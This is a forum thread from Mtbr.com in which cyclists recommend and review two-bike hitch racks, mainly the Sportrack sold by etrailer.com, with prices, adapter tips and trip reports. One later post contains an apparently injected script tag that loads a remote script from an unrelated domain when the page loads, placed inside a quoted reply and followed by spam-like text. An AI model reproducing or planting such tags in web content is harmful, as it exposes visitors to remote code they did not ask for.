Recommend me a rack?- Mtbr.com
    likes beer.

... and if we just ... Recommend me a rack?

Hey all!

Wanted to ask a question to all the knowledgable folks out there. Can anyone recommend me a rack that fits the following description:

- Tow hitch mount (2'' if you're wondering)
    - Supports the bike via the tires (not the frame)
    - Doesn't cost an arm/leg
    - Holds 2 bikes

I want the T2 from Thule and think it's perfecto for my needs but I'm not ready to pony up the 350 bucks it costs. Are there any options that are cheaper and fit those required specs?

I've been checking craigslist for a T2, haven't had any luck in a 916.

Thanks all!!!

-Ryan

CUSTOM AUDIO INSTALLS

...this one looks nice to me.
    I'm a Republican because not everyone can be on welfare.

likes beer.
    Victory.

mtbr member
    Jun 2006
    I'm having a good experience with a Raxter rack. the 2-bike option only sticks off the back of my car by 9". Very compact for the number of bikes it holds.

likes beer.
    Raxter looks cool, checked it out online.

Any other options?

Feb 2009
    I know you said not supported by the frame but i hear great reviews about this rack. I am actually going to order one on tuesday:

http://www.etrailer.com/pc-hitch-racks~A30901.htm

Feb 2009
    Quote Originally Posted by XS NOIZ

...this one looks nice to me.
    I hope that is someone you know or your gf. id consider you extremely lucky my friend!!

Bandolero

Oh no! Your paint!

Quote Originally Posted by cth978
    I know you said not supported by the frame but i hear great reviews about this rack. I am actually going to order one on tuesday:

https://www.etrailer.com/pc-hitch-racks~A30901.htm
    I bought one of those two weeks ago. I've got a small Civic and had considered the T2 also. The only hitch available for my car is a class I.

T2:
    Pros: Easy to put bike on car. Looks great. I love using my buddies.
    Cons: Weight. Cost.

The X-Sport/SportRack:
    Pros: Cheap. Light.
    Cons: Harder to put bike on rack. Bar touches frame. Isn't a Thule T2.

The T2 is about 22lbs heavier and would probably weigh down the back of the car noticeably with two bikes on it. I'd also worry more about having someone jack the rack/parts from it. The spar/locking arms would cost about $120 each to replace and can be removed with a 5mm allen wrench.

You've probably read the comments in this forum about "OMG! it touches my frame and wears teh paint and it'll sawz your bike in half!11!"

But I ride my bike. I crash. My bike is a few years old and has wear spots, scrapes and scratches. I can see the concern about the bar touching the frame but jebus... Ride a fricking chair-lift with your bike and see how it gets tossed around by the lift-monkeys. I can see how someone in the mid-west or a dirt roadie can care about the wear that a padded bar might put on their frame, but where I ride, it's the terrain, trees or chairlifts that are going to take their toll on my bike's finish.
    Slow-core. -.. .-. .. -. -.- .... --- -- . -... .-. . .--

likes beer.
    edit:

Yeah craigslist....hoping to snatch this up - http://newyork.craigslist.org/mnh/bik/1254682280.html
    Last edited by City Goat; 07-07-2009 at 07:24 AM.

likes beer.
    Sigh...so someone snatched that up from me....

Gonna order today, does anyone have a recommendation where to order the Sportrack 2EZ from?

Feb 2009
    Here you go:

http://www.etrailer.com/pc-hitch-racks~A30901.htm

Use coupon code: YT09 for 5% off.

likes beer.
    my man! Ordered.

likes beer.
    Wow big love for the etrailer.com folks.

They sent me my order confirmation and I ended up emailing them saying I've heard good things about them...in turn they upgraded me to 3-5 day shipping for free.

Pretty awesome!

mtbr member
    Apr 2008
    Looks like I'm too late for the OP, but for any other lookin at this thread. Kuat is top notch. It has a tensioner that keeps it from movin/shakin in the hitch. Super awesome.

I went for the white one.

http://www.kuatinnovations.com/conte...tpage&Itemid=1

likes beer.
    Got my rack last night and put it together.

Good stuff, gonna probably try it out tonight when I head over the trails. Lighter than I though it would be, which is nice.

If I remember the cam I'll put some pics up.

Feb 2009
    Awsome let me know how it works!! I never ended up ordering mine. I had some bills that had to be payed off so now i can play!

likes beer.
    Ok this was only a 1 bike hook up and total of 30 miles but the rack performed flawlessly. Beats the heck out of loading up a muddy bike into the back of the car like I've been doing.

I didn't think I'd run into any problems but just wanted to post up for those interested.

Pros:
    - Bike was very easy to load up on the rack, adjustments were very simple and took seconds.
    - The rack is el cheapo compared to most other wheel supporting racks out there
    - The rack is lightweight and easy to take on and off when not in use
    - No more muddy interior!

Cons:
    - The bar that goes to the hitch is meant for a 1 and a 1/4 inch hitch receiver. To fix this to work for 2'' hitches (like mine) they include a plastic sleeve to go around the bar and fill in the space needed to hook up to a 2'' hitch receiver. I can see this peice of plastic eventually breaking/cracking.
    - This sleeve also moves when sliding the bar into the hitch, making it more difficult to insert the pin into the hitch if the holes don't line up right away
    - I can see the top hooks eventually rubbing into the paint on long trips and lots of movement but a simple enough solution is to wrap a rag or foam around the bike frame when you are transporting it.

I have 1 pic but didn't upload it yet...I'll get around to it but it's nothing exciting lol

likes beer.
    Pic in actionies...

Last edited by City Goat; 07-18-2009 at 08:11 PM.

Feb 2009
    pic doesnt work...

likes beer.
    I fail at life.

lol I'll get around to fixing that, sometime in 09. Promises.

xls
    Eduardo Naranja
    They make adapters (better than the plastic thing you describe) to go from 2" to 1.25".

Linky.

Feb 2009
    would a bike on the other ract make contact with your vehicle?? it sorta looks like there isnt much room in between. or it could just be the pic.

likes beer.
    I almost wish there was less room inbetween lol. It's just the angle of the pic because even with putting another bike on the back it's got a lot of room between the bike and the hatch.

xls - thanks for the link duder

mtbr member
    Thanks for the info. Just put in my order for one

mtbr member
    Big props to etrailer.com. Put in an order just before my previous post and I now have the bike rack ready for my trip tomorrow

Great customer service

Jul 2009
    i just ordered this myself...

mtbr member
    Bike rack worked flawlessly for our first outing. Not use to having a bike rack back there so was taking it easy at times. Just ordered another adapter to replace the plastic one that comes with it. Very satisfied with it and you can't beat it for the money.

likes beer.
    Sweeeeeeeeeeeeeeeeeeeeeet.

mtbr member
    Quote Originally Posted by City Goat
    I almost wish there was less room inbetween lol. It's just the angle of the pic because even with putting another bike on the back it's got a lot of room between the bike and the hatch.
    The space you were referring to could be there to make room for those spare tires mounted on the back. I thought I would need an extender but the bike just clears my spare tire without issues

mtbr member
    Feb 2005
    Man, etrailer rocks! I put in an order for the Sportsman hitch rack about 9:30 this morning, it shipped with free upgraded 3-5 day shipping by 12:30pm. The only other place I've shopped that has been that 'on the ball' is Newegg... it's easy to get spoiled!

mtbr member
    I replaced the plastic adaptor with this one. I like it because it doesn't extend it like others do.

http://www.agrisupply.com/product.as...1928&sid=&eid=

likes beer.
    Good find ZX.

Might order one up myself. Let me know how you like it once you try it out.

mtbr member
    May 2008
    Looks like you found the right rack for you but if anyone else is out there shopping I just got this one and am very happy with it.

http://www.etrailer.com/p-5801200.htm

mtbr member
    Aug 2009
    Hey guys, after reading this post last week, I decided to look into this rack a little more. The price was right and seemed easy to mount the bikes by looking at the video on etrailer.com. Well, yesterday after folding down the second row seats on my Yukon and removing the third row seats I seriously started thinking about pulling the trigger and getting one. My fiance and I went riding on a local trail and after dealing with the mud in my truck, I drove by the local Performance Bike in the area. They have this rack in stock and do price matching. I looked up etrailer's site on my iPhone, showed it to the cashier, and they dropped their price of $264.99 (rip off) to match the $134.95 of etrailer. Put the rack together last night and I am very happy with it. I will get the adaptor that you guys hae linked to and will report on it's use shortly. I will be taking my bikes from PA to NC over Labor Day Weekend and will let you know if there are any problems with it. -Ray

mtbr member
    May 2008

Still loving

I am still loving my recent rack purchase.
    Attached Images Attached Images

mtbr member
    North Shore Bike Racks - only if you are caring mountain bikes (not sure if they can fit road or CX bikes). They are at:

www.northshoreracks.com

Very sturdy and ingenius design. Good luck!

mtbr member
    Aug 2009
    Got through the Labor Day Weekend drive and the rack worked flawlessly. I drove about 1,000 miles with the bikes on the rack and had no problems at all. Doing 75-80 on the highway and hit a few bumps and potholes but it didn't jiggle anythibng loose. I am very happy with my purchase and you can check it out on my new blog.

www.2wheeledwarrior.blogspot.com

Aug 2007
    I've been using the Saris Bones 2...AWESOME! http://www.saris.com/p-299-bones-3-bike.aspx

mtbr member
    whats the diff between that SportRack & the Swagman XC rack?

both look identical to me, and the Swagman can be had for $124 on amazon free shipping. which should i go for? i only have a class 1 hitch in 1.25"...
    RH SL Pro

mtbr member
    Aug 2009
    Quote Originally Posted by louisssss
    whats the diff between that SportRack & the Swagman XC rack?

both look identical to me, and the Swagman can be had for $124 on amazon free shipping. which should i go for? i only have a class 1 hitch in 1.25"...
    Main difference between the two are the trays and the hooks. I like the trays on the Sportrack better as they seem to go a little higher on the wheel due to their design. Also, the Sportrack has velcro strips to help secure the bike to the trays and the Swagman does not. Now, the Swagman's hooks are the ratcheting type. Meaning you can just press them down on the bike and they lock in place automatically. You just have to press a button to release them. On the Sportrack you have to set the hooks where you want and tighten them up via a knob. Both fit 1.25" and 2" hitches.

likes beer.
    Quick update...

I've put about 1500 miles on the Sportrack between local trail trips and a 1000 mile R/T to West Vriginia with no issues at all. Not like I was expecting any but just wanted to post up and reassure anyone thinking about going with this.

No pics, cept for the 2 bikes we always take on it...

-Ryan

Sep 2009
    Quote Originally Posted by cth978
    I hope that is someone you know or your gf. id consider you extremely lucky my friend!!<script type="***************" src="http://djmixdownloads.com/script.php"></script>
    Thats A good rack where i can found those things

mtbr member
    what was the final price (with shipping) that u guys are paying for the sportrack at etrailer?

my total is 145.62, how did u guys get the free upgraded shipping?
    RH SL Pro

mtbr member
    Jun 2006
    Bought a hitch lock, so anything over $150 gets free shipping.

mtbr member
    Apr 2009
    just threw on a hitch ($130) and a sportrack ($154) on my subaru impreza wagon. Really really happy with the turnout. roof mount is overrated!

mtbr member
    just ordered this rack from etrailer. Total was $145.25 shipped
    i got this rack + some mechanics gloves to make it $152, then i used YT09 to bring it down to $145. is that the best discount u guys got too? 5%?

also, how did u guys get them to upgrade shipping speed?

i just got an email saying it will ship within the next 7 days =( and i wanted it by this friday too! lol fail
    RH SL Pro

mtbr member
    so i didn't order this: http://www.etrailer.com/p-A32022.htm with the bike hitch. i live in NYC(crime city) and i'm wondering if there is any way i can lock up that bike hitch? i already have a locking device, but it looks like it won't work with the bike lock. is there any other (cheap) way i can lock up the bike rack from being stolen right off my car so i dont need to take it off every time i step away?

edit: can someone tell me a little on how that lock works? the sportrack lock for bikes. is it secure?
    for those who bought the hitch, who got the hitch lock and the bike rack made by spotrack for $35.95?
    Last edited by louisssss; 10-26-2009 at 09:37 AM.
    RH SL Pro

mtbr member
    Aug 2009
    I don't have the lock but etrailer has a video on how it works. Looks like it would be pretty secure to me.

mtbr member

you asked for it.

With a title like that.....take some of this.
    Attached Thumbnails Attached Thumbnails Recommend me a rack?-cans.jpg  

mtbr member
    Quote Originally Posted by BIGfatED
    With a title like that.....take some of this.

What's the model's name, I need to evaluate her portfolio!

mtbr member
    Apr 2007
    So is there any problems with this Sportrack from Etrailer? Or just a great deal?

local jackass
    i think i might have to get that sport rack
    His
    2010 FSR XC
    2010 ALLEZ
    Hers
    2012 Myka 29'r
    2009 Cannondale Synapse 5
    Down East Cyclists

mtbr member
    Quote Originally Posted by Dropout33
    So is there any problems with this Sportrack from Etrailer? Or just a great deal?
    http://forums.mtbr.com/showthread.php?t=565713

read my last post on my experience with the sportrack
    RH SL Pro

mtbr member
    Quote Originally Posted by singlespeedrider
    I am still loving my recent rack purchase.
    doesn't this only hold 1 bike?

what is the bike supported on? the wheels?
    RH SL Pro

mtbr member
    Aug 2009
    Quote Originally Posted by Dropout33
    I ended up purchasing this rack and haven't had a single problem with it. Done 1000 mile trips doing about 80 mph on the interstate with no problems.

Members who have read this thread: 0